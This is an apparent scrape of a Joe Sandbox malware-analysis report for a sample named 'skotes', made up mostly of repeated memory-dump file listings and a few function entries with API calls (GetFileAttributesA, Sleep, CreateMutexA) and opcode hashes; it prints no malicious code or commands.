Associated: 00000006.00000002.2943929325.0000000000B5B000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2944212064.0000000000B6A000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2944525487.0000000000B6B000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2944806255.0000000000B71000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2945152540.0000000000B82000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2945534979.0000000000B96000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2945854385.0000000000B9B000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2946226165.0000000000B9C000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2946573191.0000000000BA3000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2946939801.0000000000BAA000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2947312509.0000000000BAC000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2947594109.0000000000BBE000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2947914571.0000000000BC0000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2948235215.0000000000BC1000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2948549170.0000000000BC3000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2948832412.0000000000BC4000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2949019082.0000000000BCA000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2949315319.0000000000BD2000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2949565469.0000000000BD3000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2949851834.0000000000BD4000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2950106154.0000000000BDC000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2950334370.0000000000BDD000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2950602259.0000000000BDF000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2950864678.0000000000BEA000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2951152869.0000000000BEC000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2951385221.0000000000BF3000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2951614135.0000000000BF5000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2951614135.0000000000C25000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2952170568.0000000000C52000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2952375131.0000000000C53000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2952566299.0000000000C54000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2952735873.0000000000C59000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2952926345.0000000000C5B000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2953089376.0000000000C69000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2953301674.0000000000C6A000.00000080.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_950000_skotes.jbxd

Yara matches

Similarity

API ID: File__dosmaperr$HandleInformationType
String ID:
API String ID: 2531987475-0
Opcode ID: 467313fa52ffa2094c1009d78c524686fdc172efece80187040e3ad79e3b1f65
Instruction ID: 94df7e8308ce51fc8c2318547c483f5e94477b0c8cca48e35c02fae6b92e3b7c
Opcode Fuzzy Hash: 467313fa52ffa2094c1009d78c524686fdc172efece80187040e3ad79e3b1f65
Instruction Fuzzy Hash: 0F414CB1908204AFDB24EFB5DC459ABF7F9EF89300B204929F856D3710EA34E940DB61

Function 00959BA5 Relevance: 4.6, APIs: 3, Instructions: 140
sleepsynchronizationCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetFileAttributesA.KERNEL32(00000000), ref: 00959BA8
Sleep.KERNEL32(00000064,?), ref: 0095A963
CreateMutexA.KERNEL32(00000000,00000000,009B3254), ref: 0095A981

Memory Dump Source

Source File: 00000006.00000002.2937510596.0000000000951000.00000040.00000001.01000000.00000008.sdmp, Offset: 00950000, based on PE: true

Associated: 00000006.00000002.2937176448.0000000000950000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2937510596.00000000009B2000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2938439390.00000000009B9000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2938618221.00000000009BB000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2938957082.00000000009C5000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2939079907.00000000009C6000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2939243238.00000000009C7000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2940722734.0000000000B1D000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2940988724.0000000000B1F000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2941257722.0000000000B34000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2941445903.0000000000B35000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2941698268.0000000000B37000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2941698268.0000000000B41000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2942163259.0000000000B45000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2942439132.0000000000B46000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2942671509.0000000000B47000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2942953132.0000000000B49000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2943176077.0000000000B55000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2943428132.0000000000B56000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2943687914.0000000000B57000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2943929325.0000000000B5B000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2944212064.0000000000B6A000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2944525487.0000000000B6B000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2944806255.0000000000B71000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2945152540.0000000000B82000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2945534979.0000000000B96000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2945854385.0000000000B9B000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2946226165.0000000000B9C000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2946573191.0000000000BA3000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2946939801.0000000000BAA000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2947312509.0000000000BAC000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2947594109.0000000000BBE000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2947914571.0000000000BC0000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2948235215.0000000000BC1000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2948549170.0000000000BC3000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2948832412.0000000000BC4000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2949019082.0000000000BCA000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2949315319.0000000000BD2000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2949565469.0000000000BD3000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2949851834.0000000000BD4000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2950106154.0000000000BDC000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2950334370.0000000000BDD000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2950602259.0000000000BDF000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2950864678.0000000000BEA000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2951152869.0000000000BEC000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2951385221.0000000000BF3000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2951614135.0000000000BF5000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2951614135.0000000000C25000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2952170568.0000000000C52000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2952375131.0000000000C53000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2952566299.0000000000C54000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2952735873.0000000000C59000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2952926345.0000000000C5B000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2953089376.0000000000C69000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2953301674.0000000000C6A000.00000080.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_950000_skotes.jbxd

Yara matches

Similarity

API ID: AttributesCreateFileMutexSleep
String ID:
API String ID: 396266464-0
Opcode ID: 6a6ea46798f2a1d9ca22c25a0750fe200836a559013b3969ce71bbac5dd1d97e
Instruction ID: 4ef5b938191c9c12a2bc7672f015b74f8d109d5bf8648d66b188a707f3acd9af
Opcode Fuzzy Hash: 6a6ea46798f2a1d9ca22c25a0750fe200836a559013b3969ce71bbac5dd1d97e
Instruction Fuzzy Hash: 2C314671A04200CBFB08DB6CDD8976EBBA6EBC6311F208318E814973D5C77599898751

Function 00959CDA Relevance: 4.6, APIs: 3, Instructions: 139sleepsynchronizationCOMMON

Download Yara Rule

APIs

GetFileAttributesA.KERNEL32(00000000), ref: 00959CDD
Sleep.KERNEL32(00000064,?), ref: 0095A963
CreateMutexA.KERNEL32(00000000,00000000,009B3254), ref: 0095A981

Memory Dump Source

Source File: 00000006.00000002.2937510596.0000000000951000.00000040.00000001.01000000.00000008.sdmp, Offset: 00950000, based on PE: true

Associated: 00000006.00000002.2937176448.0000000000950000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2937510596.00000000009B2000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2938439390.00000000009B9000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2938618221.00000000009BB000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2938957082.00000000009C5000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2939079907.00000000009C6000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2939243238.00000000009C7000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2940722734.0000000000B1D000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2940988724.0000000000B1F000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2941257722.0000000000B34000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2941445903.0000000000B35000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2941698268.0000000000B37000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2941698268.0000000000B41000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2942163259.0000000000B45000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2942439132.0000000000B46000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2942671509.0000000000B47000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2942953132.0000000000B49000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2943176077.0000000000B55000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2943428132.0000000000B56000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2943687914.0000000000B57000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2943929325.0000000000B5B000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2944212064.0000000000B6A000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2944525487.0000000000B6B000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2944806255.0000000000B71000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2945152540.0000000000B82000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2945534979.0000000000B96000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2945854385.0000000000B9B000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2946226165.0000000000B9C000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2946573191.0000000000BA3000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2946939801.0000000000BAA000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2947312509.0000000000BAC000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2947594109.0000000000BBE000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2947914571.0000000000BC0000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2948235215.0000000000BC1000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2948549170.0000000000BC3000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2948832412.0000000000BC4000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2949019082.0000000000BCA000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2949315319.0000000000BD2000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2949565469.0000000000BD3000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2949851834.0000000000BD4000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2950106154.0000000000BDC000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2950334370.0000000000BDD000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2950602259.0000000000BDF000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2950864678.0000000000BEA000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2951152869.0000000000BEC000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2951385221.0000000000BF3000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2951614135.0000000000BF5000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2951614135.0000000000C25000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2952170568.0000000000C52000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2952375131.0000000000C53000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2952566299.0000000000C54000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2952735873.0000000000C59000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2952926345.0000000000C5B000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2953089376.0000000000C69000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2953301674.0000000000C6A000.00000080.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_950000_skotes.jbxd

Yara matches

Similarity

API ID: AttributesCreateFileMutexSleep
String ID:
API String ID: 396266464-0
Opcode ID: ab5997244b9bb868d82f21f525b96074bdb64044ffddd83e3dd92af824dc426c
Instruction ID: 93bb4a58d226c90c7e05259087e8216f998d7b70e0dd19e2cb0b7b25acf91230
Opcode Fuzzy Hash: ab5997244b9bb868d82f21f525b96074bdb64044ffddd83e3dd92af824dc426c
Instruction Fuzzy Hash: D83113716042408BFB18DB68DDC97ADB6A6DFC6311F248718E8149B3D5CB3599888B25

Function 00959F44 Relevance: 4.6, APIs: 3, Instructions: 137sleepsynchronizationCOMMON

Download Yara Rule

APIs

GetFileAttributesA.KERNEL32(00000000), ref: 00959F47
Sleep.KERNEL32(00000064,?), ref: 0095A963
CreateMutexA.KERNEL32(00000000,00000000,009B3254), ref: 0095A981

Memory Dump Source

Source File: 00000006.00000002.2937510596.0000000000951000.00000040.00000001.01000000.00000008.sdmp, Offset: 00950000, based on PE: true

Associated: 00000006.00000002.2937176448.0000000000950000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2937510596.00000000009B2000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2938439390.00000000009B9000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2938618221.00000000009BB000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2938957082.00000000009C5000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2939079907.00000000009C6000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2939243238.00000000009C7000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2940722734.0000000000B1D000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2940988724.0000000000B1F000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2941257722.0000000000B34000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2941445903.0000000000B35000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2941698268.0000000000B37000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2941698268.0000000000B41000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2942163259.0000000000B45000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2942439132.0000000000B46000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2942671509.0000000000B47000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2942953132.0000000000B49000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2943176077.0000000000B55000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2943428132.0000000000B56000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2943687914.0000000000B57000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2943929325.0000000000B5B000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2944212064.0000000000B6A000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2944525487.0000000000B6B000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2944806255.0000000000B71000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2945152540.0000000000B82000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2945534979.0000000000B96000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2945854385.0000000000B9B000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2946226165.0000000000B9C000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2946573191.0000000000BA3000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2946939801.0000000000BAA000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2947312509.0000000000BAC000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2947594109.0000000000BBE000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2947914571.0000000000BC0000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2948235215.0000000000BC1000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2948549170.0000000000BC3000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2948832412.0000000000BC4000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2949019082.0000000000BCA000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2949315319.0000000000BD2000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2949565469.0000000000BD3000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2949851834.0000000000BD4000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2950106154.0000000000BDC000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2950334370.0000000000BDD000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2950602259.0000000000BDF000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2950864678.0000000000BEA000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2951152869.0000000000BEC000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2951385221.0000000000BF3000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2951614135.0000000000BF5000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2951614135.0000000000C25000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2952170568.0000000000C52000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2952375131.0000000000C53000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2952566299.0000000000C54000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2952735873.0000000000C59000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2952926345.0000000000C5B000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2953089376.0000000000C69000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2953301674.0000000000C6A000.00000080.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_950000_skotes.jbxd

Yara matches

Similarity

API ID: AttributesCreateFileMutexSleep
String ID:
API String ID: 396266464-0
Opcode ID: 08a5698ad9a0c4834c48f4de8cae289bd87217370794f335c7130a3ea257cb21
Instruction ID: 40dd98f0488379c5fbf07d879b26b1603ccf2ba4cde9cd7798fcb66749bd735a
Opcode Fuzzy Hash: 08a5698ad9a0c4834c48f4de8cae289bd87217370794f335c7130a3ea257cb21
Instruction Fuzzy Hash: 9E316871B042008BFB18DB79DD897ADB766EFC6311F208718E824DB3D5CB3599888716

Function 0095A079 Relevance: 4.6, APIs: 3, Instructions: 136sleepsynchronizationCOMMON

Download Yara Rule

APIs

GetFileAttributesA.KERNEL32(00000000), ref: 0095A07C
Sleep.KERNEL32(00000064,?), ref: 0095A963
CreateMutexA.KERNEL32(00000000,00000000,009B3254), ref: 0095A981

Memory Dump Source

Source File: 00000006.00000002.2937510596.0000000000951000.00000040.00000001.01000000.00000008.sdmp, Offset: 00950000, based on PE: true

Associated: 00000006.00000002.2937176448.0000000000950000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2937510596.00000000009B2000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2938439390.00000000009B9000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2938618221.00000000009BB000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2938957082.00000000009C5000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2939079907.00000000009C6000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2939243238.00000000009C7000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2940722734.0000000000B1D000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2940988724.0000000000B1F000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2941257722.0000000000B34000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2941445903.0000000000B35000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2941698268.0000000000B37000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2941698268.0000000000B41000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2942163259.0000000000B45000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2942439132.0000000000B46000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2942671509.0000000000B47000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2942953132.0000000000B49000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2943176077.0000000000B55000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2943428132.0000000000B56000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2943687914.0000000000B57000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2943929325.0000000000B5B000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2944212064.0000000000B6A000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2944525487.0000000000B6B000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2944806255.0000000000B71000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2945152540.0000000000B82000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2945534979.0000000000B96000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2945854385.0000000000B9B000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2946226165.0000000000B9C000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2946573191.0000000000BA3000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2946939801.0000000000BAA000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2947312509.0000000000BAC000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2947594109.0000000000BBE000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2947914571.0000000000BC0000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2948235215.0000000000BC1000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2948549170.0000000000BC3000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2948832412.0000000000BC4000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2949019082.0000000000BCA000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2949315319.0000000000BD2000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2949565469.0000000000BD3000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2949851834.0000000000BD4000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2950106154.0000000000BDC000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2950334370.0000000000BDD000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2950602259.0000000000BDF000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2950864678.0000000000BEA000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2951152869.0000000000BEC000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2951385221.0000000000BF3000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2951614135.0000000000BF5000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2951614135.0000000000C25000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2952170568.0000000000C52000.00000080.00000001.01000000.00000008.sdmpDownload File
